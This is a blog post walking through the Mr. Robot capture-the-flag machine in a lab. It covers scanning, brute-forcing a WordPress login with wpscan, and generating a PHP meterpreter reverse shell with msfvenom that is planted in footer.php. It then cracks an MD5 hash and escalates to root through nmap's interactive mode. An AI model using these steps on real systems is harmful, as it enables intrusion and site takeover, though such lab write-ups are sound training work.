Mr. Robot – CTF

This is my walk-through of the Mr. Robot CTF challenge posted on All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law.  Be smart folks, and enjoy the walk-through.

Full NMAP scan of host:

root@kali:~# nmap -p- -A


The NMAP scan shows port 80 & 443 open.  A quick check with a browser:  Lots to read, and videos too:


A Nikto scan against port 80 tell us that the site is running WordPress, and there is a robots.txt file:

root@kali:~# nikto -h


Using Curl to view robots.txt:

root@kali:~# curl -i -L


The robots.txt file contains 2 entries.  Our first key, and a dictionary file.

Using Curl to view our first key:

root@kali:~# curl -i -L


Downloading the dictionary file using Wget:

root@kali:~/Downloads# wget


So we have our first key, where to now? I know that the site is running WordPress and I have a dictionary file that I will assume contains the password for a WordPress user.  I ran WPscan and didn’t find anything of use.  I tried to enumerate users using both WPscan and Metasploit but no luck.  I tried to brute force the admin user with the dictionary file I downloaded, but that did not work either.  So now what?

I went back and revisited the website, watched all the videos and viewed the source of all of the pages and I found something of interest.  Go back to the main site and type prepare and watch the video:


The video makes reference to a website,  I visited the site and something that stood out on the main page, the name Elliot is listed as a command.  Elliot is the main character in the series.  I think we have found our WordPress user:


I used WPscan to brute force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot’s password is ER28-0652:

root@kali:~# wpscan -u –wordlist /root/Downloads/fsocity.dic –username elliot -t 10



Logged into WordPress using Elliot’s credentials:


Elliot is has admin privileges in WordPress. An easy way to get a shell is to create PHP reverse shellcode using Msfvenom and add it one of WordPress PHP files. In my case I will add my PHP code to footer.php.

Creating reverse shellcode using Msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw


Pasting my PHP code into the footer.php file.  You can navigate here by clicking on appearance–>editor–>footer.php:


Now that I have the shellcode in place, I fire up my Metasploit handler to receive the shell.  You can see my options below:


I execute the shellcode using Curl:


Received the shell with Metasploit:


So now I have a low privilege shell. Poking around a bit, I find key 2 but I don’t have privileges to view it.  I also find a file that contains the username robot and a MD5 password hash:


I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:


I su to robot ,and I am able to view key 2:


Poking around a bit more.  There is a root folder.  I am assuming key 3 is there, so we need to escalate privileges on this host.  I download the file to the host and run it. Immediately, I find something interesting:


I run NMAP in interactive mode and drop to a !sh with root privileges.  I find key 3 in the root folder as expected:

robot@linux:/tmp$ nmap –interactive


Hope you found this helpful 🙂

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s